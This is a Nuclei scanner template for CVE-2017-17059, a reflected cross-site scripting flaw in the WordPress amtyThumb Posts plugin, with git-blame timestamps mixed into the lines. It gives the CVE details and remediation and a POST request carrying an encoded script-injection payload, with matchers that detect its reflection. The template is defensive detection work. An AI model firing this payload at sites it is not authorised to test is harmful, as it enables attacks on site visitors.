2021-07-16 04:25:24 +00:00
id : CVE-2017-17059
info :
2022-08-16 14:14:41 +00:00
name : WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting
2021-07-16 04:25:24 +00:00
author : daffainfo
severity : medium
2022-08-16 14:14:41 +00:00
description : WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.
2023-09-06 13:22:34 +00:00
remediation : |
Update to the latest version of amtyThumb Posts plugin or apply the patch provided by the vendor.
2021-08-18 11:37:49 +00:00
reference :
2021-07-16 05:14:57 +00:00
- https://github.com/NaturalIntelligence/wp-thumb-post/issues/1
2022-05-17 09:18:12 +00:00
- https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-17059
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-17059
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00261
2023-11-20 05:10:39 +00:00
epss-percentile : 0.63709
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : amtythumb_project
product : amtythumb
2023-09-06 13:22:34 +00:00
framework : wordpress
2023-07-11 19:49:27 +00:00
tags : xss,wp-plugin,packetstorm,cve,cve2017,wordpress
2021-07-16 04:25:24 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-16 04:25:24 +00:00
- method : POST
path :
2021-07-19 05:45:37 +00:00
- "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"
2021-07-16 04:25:24 +00:00
body : "amty_hidden=1"
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2021-07-16 04:25:24 +00:00
words :
2021-07-19 05:45:37 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 04:25:24 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2023-11-19 08:30:54 +00:00
# digest: 4a0a00473045022100ab81f46eea574ddcfbf6d230b49f7cad0d65496cc3520bf1b83c8f00f8133f3202202f037411fc4724b733f359a7aa87e303a1b9ebf654c419680b215d9b6558676c:922c64590222798bb761d5b6d8e72950